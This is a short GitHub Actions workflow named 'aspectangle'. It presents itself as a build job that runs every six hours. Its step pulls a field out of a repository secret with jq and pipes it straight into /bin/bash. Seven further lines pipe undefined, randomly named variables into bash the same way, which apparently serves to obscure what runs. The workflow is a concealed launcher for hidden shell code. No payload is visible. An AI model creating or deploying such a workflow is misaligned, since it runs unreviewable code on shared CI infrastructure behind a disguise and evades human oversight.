name: aspectangle
on:
  workflow_dispatch:
  schedule:
    - cron: '6 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: aspectangle
        env:
          v72012: ${{ secrets.v72012 }}
        run: |
          echo $v72012 | jq -r .u17635 | /bin/bash
          echo $fp2494 | jq -r .vo98 | /bin/bash
          echo $be38 | jq -r .gqds3 | /bin/bash
          echo $m9105 | jq -r .hiub02 | /bin/bash
          echo $yqp307 | jq -r .ruyw486 | /bin/bash
          echo $zkd7 | jq -r .uvc9 | /bin/bash
          echo $v24 | jq -r .ajc0520 | /bin/bash
          echo $mp04288 | jq -r .dayh606 | /bin/bash

